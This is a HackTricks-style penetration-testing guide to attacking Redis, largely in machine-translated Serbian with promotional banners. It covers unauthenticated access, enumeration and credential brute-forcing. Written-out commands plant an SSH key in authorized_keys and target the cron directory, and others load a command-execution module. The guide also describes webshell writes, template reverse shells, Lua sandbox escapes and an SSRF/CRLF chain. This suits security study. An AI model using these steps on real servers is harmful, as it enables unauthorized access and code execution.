6379 - Pentesting Redis
Last updated
Last updated
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Join HackenProof Discord server to communicate with experienced hackers and bug bounty hunters!
Hacking Insights Engage with content that delves into the thrill and challenges of hacking
Real-Time Hack News Keep up-to-date with fast-paced hacking world through real-time news and insights
Latest Announcements Stay informed with the newest bug bounties launching and crucial platform updates
Join us on Discord and start collaborating with top hackers today!
From the docs: Redis je open source (BSD licenciran), u memoriji skladište podataka, korišćeno kao baza podataka, keš i posrednik poruka).
Po defaultu, Redis koristi protokol zasnovan na običnom tekstu, ali treba imati na umu da takođe može implementirati ssl/tls. Learn how to run Redis with ssl/tls here.
Podrazumevani port: 6379
Неколико автоматизованих алата који могу помоћи у добијању информација из redis инстанце:
Redis je protokol zasnovan na tekstu, možete jednostavno poslati komandu u soket i vraćene vrednosti će biti čitljive. Takođe zapamtite da Redis može raditi koristeći ssl/tls (ali to je veoma neobično).
U regularnoj Redis instanci možete se jednostavno povezati koristeći nc
ili možete koristiti i redis-cli
:
Prva komanda koju možete probati je info
. Ona može vratiti izlaz sa informacijama o Redis instanci ili nešto poput sledećeg:
U ovom poslednjem slučaju, to znači da vam trebaju važeće akreditive za pristup Redis instanci.
Podrazumevano Redis se može pristupiti bez akreditiva. Međutim, može biti konfiguran da podrži samo lozinku, ili korisničko ime + lozinku.
Moguće je postaviti lozinku u redis.conf datoteci sa parametrima requirepass
ili privremeno dok se usluga ne restartuje povezivanjem na nju i pokretanjem: config set requirepass p@ss$12E45
.
Takođe, korisničko ime može biti konfigurisano u parametru masteruser
unutar redis.conf datoteke.
Ako je samo lozinka konfigurisana, korisničko ime koje se koristi je "default". Takođe, imajte na umu da ne postoji način da se spolja sazna da li je Redis konfiguran samo sa lozinkom ili korisničkim imenom + lozinkom.
U slučajevima poput ovog, trebaće vam da pronađete važeće akreditive da biste interagovali sa Redis-om, pa možete pokušati da brute-force to. U slučaju da pronađete važeće akreditive, potrebno je da autentifikujete sesiju nakon uspostavljanja veze sa komandom:
Validni kredencijali će odgovoriti sa: +OK
Ako Redis server dozvoljava anonimne konekcije ili ako ste dobili validne kredencijale, možete započeti proces enumeracije za servis koristeći sledeće komande:
Ostale Redis komande se mogu naći ovde i ovde.
Napomena da se Redis komande instance mogu preimenovati ili ukloniti u redis.conf datoteci. Na primer, ova linija će ukloniti komandu FLUSHDB:
Više o bezbednoj konfiguraciji Redis usluge ovde: https://www.digitalocean.com/community/tutorials/how-to-install-and-secure-redis-on-ubuntu-18-04
Takođe možete pratiti u realnom vremenu Redis komande koje se izvršavaju sa komandom monitor
ili dobiti top 25 najsporijih upita sa slowlog get 25
Pronađite više zanimljivih informacija o više Redis komandi ovde: https://lzone.de/cheat-sheet/Redis
Unutar Redis-a baze podataka su brojevi počevši od 0. Možete saznati da li se bilo koja koristi u izlazu komande info
unutar "Keyspace" dela:
Ili možete jednostavno dobiti sve keyspace-ove (baze podataka) sa:
U tom primeru se koriste baze podataka 0 i 1. Baza podataka 0 sadrži 4 ključa, a baza podataka 1 sadrži 1. Po defaultu, Redis će koristiti bazu podataka 0. Da biste dumpovali, na primer, bazu podataka 1, potrebno je da uradite:
U slučaju da dobijete sledeću grešku -WRONGTYPE Operation against a key holding the wrong kind of value
dok izvršavate GET <KEY>
, to je zato što ključ može biti nešto drugo osim stringa ili celog broja i zahteva poseban operator za prikazivanje.
Da biste saznali tip ključa, koristite komandu TYPE
, primer ispod za listu i hash ključeve.
Dump the database with npm redis-dump or python redis-utils
Join HackenProof Discord server to communicate with experienced hackers and bug bounty hunters!
Hacking Insights Angažujte se sa sadržajem koji se bavi uzbuđenjem i izazovima hakovanja
Real-Time Hack News Budite u toku sa brzim svetom hakovanja kroz vesti i uvide u realnom vremenu
Latest Announcements Budite informisani o najnovijim nagradama za greške i važnim ažuriranjima platformi
Join us on Discord and start collaborating with top hackers today!
redis-rogue-server može automatski dobiti interaktivnu ljusku ili obrnutu ljusku u Redis-u (<=5.0.5).
Informacije iz ovde. Morate znati putanju foldera veb sajta:
Ako dođe do izuzetka pristupa webshell-u, možete isprazniti bazu podataka nakon pravljenja rezervne kopije i pokušati ponovo, zapamtite da vratite bazu podataka.
Kao u prethodnom odeljku, takođe možete prepisati neki html template fajl koji će biti interpretiran od strane template engine-a i dobiti shell.
Na primer, prateći ovaj izveštaj, možete videti da je napadač ubacio rev shell u html koji interpretira nunjucks template engine:
Napomena da nekoliko engine-a za šablone kešira šablone u memoriji, tako da čak i ako ih prepišete, novi neće biti izvršen. U ovim slučajevima, ili je programer ostavio automatsko ponovno učitavanje aktivno ili treba da uradite DoS nad uslugom (i očekujete da će biti automatski ponovo pokrenuta).
Primer odavde
Molimo vas da budete svesni da se rezultat config get dir
može promeniti nakon drugih ručnih eksploatacionih komandi. Preporučuje se da ga pokrenete prvo odmah nakon prijavljivanja u Redis. U izlazu config get dir
možete pronaći home redis korisnika (obično /var/lib/redis ili /home/redis/.ssh), i znajući ovo znate gde možete napisati datoteku authenticated_users
za pristup putem ssh sa korisnikom redis. Ako znate home drugog važećeg korisnika gde imate dozvole za pisanje, možete ga takođe zloupotrebiti:
Generišite ssh javni-privatni ključ na vašem računaru: ssh-keygen -t rsa
Napišite javni ključ u datoteku : (echo -e "\n\n"; cat ~/id_rsa.pub; echo -e "\n\n") > spaced_key.txt
Uvezite datoteku u redis : cat spaced_key.txt | redis-cli -h 10.85.0.52 -x set ssh_key
Sačuvajte javni ključ u authorized_keys datoteci na redis serveru:
Na kraju, možete ssh na redis server sa privatnim ključem : ssh -i id_rsa redis@10.85.0.52
Ova tehnika je automatizovana ovde: https://github.com/Avinash-acid/Redis-Server-Exploit
Poslednji primer je za Ubuntu, za Centos, gornja komanda bi trebala biti: redis-cli -h 10.85.0.52 config set dir /var/spool/cron/
Ova metoda se takođe može koristiti za zarađivanje bitcoina :yam
Prateći uputstva sa https://github.com/n0b0dyCN/RedisModules-ExecuteCommand možete kompilirati redis modul za izvršavanje proizvoljnih komandi.
Zatim vam je potreban način da otpremite kompajlirani modul.
Učitajte otpremljeni modul u vreme izvršavanja sa MODULE LOAD /path/to/mymodule.so
.
Prikažite učitane module da proverite da li je ispravno učitan: MODULE LIST
.
Izvršite komande:
Otpustite modul kad god želite: MODULE UNLOAD mymodule
.
Ovde možete videti da Redis koristi komandu EVAL za izvršavanje Lua koda u sandboxu. U povezanom postu možete videti kako to zloupotrebiti koristeći funkciju dofile, ali očigledno to više nije moguće. U svakom slučaju, ako možete zaobići Lua sandbox mogli biste izvršiti proizvoljne komande na sistemu. Takođe, iz istog posta možete videti neke opcije za izazivanje DoS.
Neki CVE-ovi za izlazak iz LUA:
Master redis sve operacije automatski sinhronizuje sa slave redis, što znači da možemo smatrati ranjivost redis kao slave redis, povezan sa master redis koji kontrolišemo, zatim možemo uneti komandu u naš vlastiti redis.
Ako možete poslati čist tekst zahtev ka Redis-u, možete komunicirati sa njim jer će Redis čitati red po red zahtev i jednostavno odgovarati greškama na redove koje ne razume:
Zato, ako pronađete SSRF vuln na veb sajtu i možete kontrolisati neke header-e (možda sa CRLF vuln) ili POST parametre, moći ćete da šaljete proizvoljne komande Redis-u.
U Gitlab11.4.7 otkrivene su SSRF ranjivosti i CRLF. SSRF ranjivost je bila u funkcionalnosti uvoza projekta sa URL-a prilikom kreiranja novog projekta i omogućila je pristup proizvoljnim IP-ovima u formi [0:0:0:0:0:ffff:127.0.0.1] (ovo će pristupiti 127.0.0.1), a CRLF vuln je iskorišćen jednostavno dodavanjem %0D%0A karaktera u URL.
Zato je bilo moguće zloupotrebiti ove ranjivosti da komunicirate sa Redis instancom koja upravlja redovima iz gitlab-a i zloupotrebiti te redove da dobijete izvršenje koda. Payload za zloupotrebu Redis reda je:
I zahtev URL encode koji zloupotrebljava SSRF i CRLF da izvrši whoami
i pošalje izlaz putem nc
je:
Iz nekog razloga (kao za autora https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/ odakle je ova informacija preuzeta) eksploatacija je radila sa git
shemom, a ne sa http
shemom.
Pridružite se HackenProof Discord serveru da komunicirate sa iskusnim hakerima i lovcima na greške!
Hacking Insights Uključite se u sadržaj koji se bavi uzbuđenjem i izazovima hakovanja
Real-Time Hack News Budite u toku sa brzim svetom hakovanja kroz vesti i uvide u realnom vremenu
Latest Announcements Budite informisani o najnovijim nagradama za greške i važnim ažuriranjima platformi
Pridružite nam se na Discord i počnite da sarađujete sa vrhunskim hakerima danas!
Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)